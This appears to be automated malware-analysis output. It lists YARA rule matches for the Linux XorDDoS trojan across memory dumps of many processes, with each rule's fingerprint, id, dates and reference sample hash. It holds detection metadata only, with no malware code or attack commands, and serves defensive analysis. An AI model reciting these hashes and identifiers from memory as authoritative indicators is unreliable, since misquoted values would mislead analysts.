Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
